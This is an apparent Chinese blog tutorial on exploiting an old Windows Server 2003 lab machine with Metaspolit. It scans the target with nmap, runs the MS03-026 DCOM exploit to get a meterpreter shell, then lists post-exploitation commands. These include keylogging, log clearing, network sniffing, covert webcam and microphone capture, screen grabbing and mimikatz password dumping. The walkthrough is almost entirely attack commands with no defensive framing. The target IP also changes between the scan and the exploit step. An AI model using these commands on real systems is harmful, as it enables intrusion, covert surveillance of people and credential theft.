写点什么

网络安全 kali web 安全 Kali 之 msf 简单的漏洞利用

作者:学神来啦
  • 2022 年 3 月 08 日
  • 本文字数:1555 字

    阅读完需:约 5 分钟

信息收集

靶机的 IP 地址为:192.168.173.136

利用 nmap 工具扫描其开放端口、系统等

整理一下目标系统的相关信息

系统版本:Windows server 2003

开放的端口及服务:

21/tcp   	ftp135/tcp  	msrpc139/tcp  	netbios-ssn445/tcp  	microsoft-ds777/tcp  	multiling-http1025/tcp 	NFS-or-IIS1026/tcp 	LSA-or-nterm1029/tcp 	ms-lsa1030/tcp 	iad16002/tcp 	X11:27001/tcp 	afs3-callback7002/tcp 	afs3-prserver8099/tcp 	未知服务
复制代码

漏洞分析

从扫描出的端口发现,目标主机开启了 135 端口,服务为 msrpc(远程过程调用服务),即 Windows 的 RPC 服务。

​针对这个服务,我们就可以尝试去利用一下。

漏洞利用

kali 机打开 Metaspolit:

root@kali:~# msfconsole
复制代码

查找所有跟 Windows RPC 相关的漏洞攻击:

msf5 > search dcom
复制代码


使用 MS-03-026 进行攻击:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 
复制代码

为了实施攻击,查看漏洞攻击的选项和条件:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
复制代码


知道攻击所需要的条件,接下来进行设置,只需要设置我们攻击的目标主机即可:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136RHOSTS => 192.168.174.136
复制代码

设置好攻击条件之后,接下来就进行攻击:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 
复制代码


执行攻击命令之后,我们获取到了目标主机的 shell 权限,现在,可以执行命令查看目标主机的一些东西,比如网络配置信息:

meterpreter > ipconfig
复制代码


如需进一步攻击利用,可配合其他命令进一步操作。

meterpreter 下相关命令

基本系统命令——————————shell			进入目标主机cmd shellreboot			重启目标主机shutdown		关闭目标主机sysinfo			查看目标主机系统信息background		将当前会话放置后台info			查看已有信息模块run				执行已有的模块,输入run后按tab键补全,会列出已有的脚本clearav 		清除windows中的应用程序日志、系统日志、安全日志ipconfig		查看网络配置信息netstat			查看网络连接信息getproxy		查看代理信息route			查看路由arp				查看arp信息
复制代码


进程列表:——————————getuid			获取系统ID以及计算机名称getpid			获取当前进程标识符kill			结束进程ps				列出正在运行中的进程
复制代码


鼠标/键盘操作——————————keyscan_start	开启按键记录会话keyscan_stop	终止按键记录会话keyscan_dump	转储从目标主机捕获到的按键记录uictl enable mouse 		启用鼠标uictl disable mouse  	禁用鼠标uictl enable keyboard	启用键盘uictl disable keyboard  禁用键盘
复制代码


会话——————————enumdesktops	列举所有可访问到的桌面和工作站getdesktop		获取当前Meterpreter桌面setdesktop		变更Meterpreter当前桌面
复制代码


嗅探功能——————————use sniffer		加载嗅探功能sniffer_interfaces   	查看网卡sniffer_start	开始对网卡执行嗅探sniffer_stats	查看状态sniffer_stop	停止对网卡的嗅探sniffer_dump	将捕获到的目标主机上的数据转储到本地
复制代码


摄像头命令——————————webcam_list		列举系统所有的摄像头webcam_snap		使用目标主机摄像头拍照record_mic		从主机的默认麦克风中记录环境声音webcam_stream	通过摄像头开启视频
复制代码


远程桌面/截屏——————————enumdesktops	查看可用的桌面getdesktop		获取当前meterpreter 关联的桌面set_desktop		设置meterpreter关联的桌面  -h查看帮助screenshot		截屏use espia		或者使用espia模块截屏  然后输入screengrabrun vnc			使用vnc远程桌面连接
复制代码


抓取密码——————————load mimikatz	查看帮助wdigest			获取Wdigest密码mimikatz_command -f samdump::hashes		执行mimikatz原始命令mimikatz_command -f sekurlsa::searchPasswords
复制代码



用户头像

学神来啦

关注

还未添加个人签名 2021.06.02 加入

10年Linux使用及管理经验,7年IT在线教育培训经验。精通Linux、Python、思科、C++、安全渗透等技术。曾任职国内知名互联网公司高级运维架构师、运维总监。对基于Linux下开源程序Openstack、Docker、K8S、DevOps、

评论

发布
暂无评论
网络安全kali  web安全   Kali之msf简单的漏洞利用_网络安全_学神来啦_InfoQ写作平台